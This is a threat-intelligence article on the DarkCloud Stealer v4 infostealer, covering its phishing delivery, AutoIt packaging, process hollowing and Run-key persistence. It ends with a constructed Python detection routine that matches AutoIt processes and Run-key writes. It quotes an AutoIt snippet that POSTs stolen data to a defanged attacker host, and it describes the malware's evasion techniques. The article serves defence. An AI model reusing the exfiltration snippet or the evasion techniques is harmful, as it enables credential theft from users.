Known as DarkCloud Stealer v4, this variant has been active since March 2025. It has targeted financial institutions, healthcare providers, and e-commerce platforms across Asia and Europe.
Security researchers warn that the malware’s use of old tools like AutoIt, combined with advanced obfuscation, makes it difficult to detect with standard security software.
Stealth Through AutoIt and Obfuscation
Experts from Palo Alto Networks’ Unit 42 report that DarkCloud v4 compiles malicious scripts into standalone AutoIt executables. These mimic legitimate software processes, helping the malware bypass heuristic scans and sandbox analysis.
The malware spreads through phishing emails disguised as invoice alerts, malicious ad redirects, and fake software updates for popular tools such as Slack and Zoom.
Once installed, the stealer extracts browser cookies, saved passwords, autofill information, and two-factor authentication (2FA) tokens. The stolen data is then sent to attacker-controlled servers over encrypted HTTPS connections.
Researchers estimate that DarkCloud v4 has compromised over 120,000 accounts, with the stolen credentials sold on dark web marketplaces.
The malware’s modular architecture allows it to receive new payloads, making it adaptable to evolving security defenses.
Inside the Attack: AutoIt and Process Hollowing
DarkCloud v4’s main innovation lies in its use of AutoIt, a scripting language usually used for administrative tasks. The malware hides its payload in an AutoIt interpreter, which runs the code directly in system memory.
; Sample AutoIt code snippet used in data exfiltration
#include
$hSession = _WinHttpOpen()
$hConnect = _WinHttpConnect($hSession, "malware[.]cc")
$hRequest = _WinHttpSendRequest($hConnect, "POST", "/exfil", ..., $sData)
This code shows how the malware exfiltrates data using an HTTP POST request.
To avoid static detection, DarkCloud v4 uses Base64 and XOR encoding and adds junk instructions to confuse analysis tools. It also uses process hollowing—a technique where it injects malicious code into trusted processes like explorer.exe or svchost.exe.
In process hollowing, the malware pauses a legitimate process, replaces its memory content with its own code, and resumes the process. This method leaves few signs of compromise and is often seen only in memory forensic dumps.
To maintain persistence, DarkCloud v4 creates scheduled tasks and Registry entries under:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Defensive Measures and Recommendations
Organizations are urged to monitor for suspicious AutoIt activity, especially processes that initiate unexpected network connections.
Behavior-based endpoint detection should look for unusual process injections and rapid attempts to access credentials. Compiled AutoIt files (.a3x) or script-based processes launched by trusted apps should be treated as suspicious.
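The detection ideas above (AutoIt or .a3x processes, network connections from them, and Run-key persistence) written out as a small correlation routine over endpoint telemetry. This is an added example, not code from the article or from Unit 42; the Sysmon-like field names, the trusted-parent list and the sample events are constructed.

```python
"""Toy detection logic for the DarkCloud v4 behaviours the article lists.
Event records loosely follow Sysmon (EventID 1 = process create,
3 = network connect, 13 = registry value set); field names and the
sample events are constructed for this example."""
import re

AUTOIT_RE = re.compile(r"autoit3(_x64)?\.exe|\S+\.a3x\b", re.I)
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
# Parents that have no business spawning a script interpreter (constructed list).
TRUSTED_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "chrome.exe", "msedge.exe"}

def is_autoit(text: str) -> bool:
    """True if an image path, command line or registry value refers to AutoIt."""
    return AUTOIT_RE.search(text) is not None

def detect(events):
    """Return (severity, pid, reason) findings. Network connections are
    correlated with earlier AutoIt process creations by PID."""
    findings, autoit_pids = [], set()
    for ev in events:
        pid, eid = ev["ProcessId"], ev["EventID"]
        if eid == 1 and is_autoit(ev["Image"] + " " + ev.get("CommandLine", "")):
            autoit_pids.add(pid)
            parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
            sev = "high" if parent in TRUSTED_PARENTS else "medium"
            findings.append((sev, pid, f"AutoIt/.a3x process spawned by {parent or 'unknown'}"))
        elif eid == 3 and pid in autoit_pids:
            findings.append(("high", pid, f"AutoIt process connected to {ev['DestinationIp']}:{ev['DestinationPort']}"))
        elif eid == 13 and RUN_KEY_RE.search(ev["TargetObject"]) and is_autoit(ev.get("Details", "")):
            findings.append(("high", pid, f"Run-key persistence -> {ev['Details']}"))
    return findings

# Constructed sample telemetry: a benign login shell, and a mail-delivered
# AutoIt stub running an .a3x script that then beacons out and persists.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4000, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe"},
    {"EventID": 1, "ProcessId": 5120, "Image": r"C:\Users\Public\Invoice_0425.exe",
     "CommandLine": r'"C:\Users\Public\Invoice_0425.exe" C:\Users\Public\inv.a3x',
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"EventID": 3, "ProcessId": 4000, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 3, "ProcessId": 5120, "DestinationIp": "203.0.113.7", "DestinationPort": 443},
    {"EventID": 13, "ProcessId": 5120,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate",
     "Details": r'"C:\Users\Public\AutoIt3.exe" C:\Users\Public\inv.a3x'},
]

if __name__ == "__main__":
    for sev, pid, reason in detect(SAMPLE_EVENTS):
        print(f"[{sev}] pid={pid} {reason}")
```

Only the phishing-delivered process trips the rules; the benign explorer.exe connection on the same port produces nothing, which is the point of correlating by PID rather than alerting on every outbound 443.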
Palo Alto Networks recommends application allowlisting and network segmentation to limit the spread of such malware.
Most importantly, users should remain alert to phishing and social engineering tactics, which remain the primary delivery method for DarkCloud v4.